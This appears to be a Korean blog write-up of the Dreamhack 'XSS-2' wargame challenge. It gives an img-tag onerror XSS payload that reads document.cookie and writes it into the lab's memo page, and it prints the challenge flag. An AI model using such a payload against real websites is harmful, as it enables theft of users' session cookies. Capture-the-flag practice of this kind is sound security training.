[Dreamhack] XSS-2 풀이

Y·2024년 3월 18일

Dreamhack

목록 보기
6/11

드림핵: XSS-2
https://dreamhack.io/wargame/challenges/268

1. 문제

2. 풀이

vuln.html에서 발생하는 취약점을 통해 이용자의 쿠키를 탈취해야 한다.


아래의 익스플로잇 코드를 flag에 입력한 후

<img src="XSS-2" onerror="location.href='/memo?memo='+document.cookie">

memo에 들어가면 flag를 확인할 수 있다.

3. FLAG

DH{3c01577e9542ec24d68ba0ffb846508f}

0개의 댓글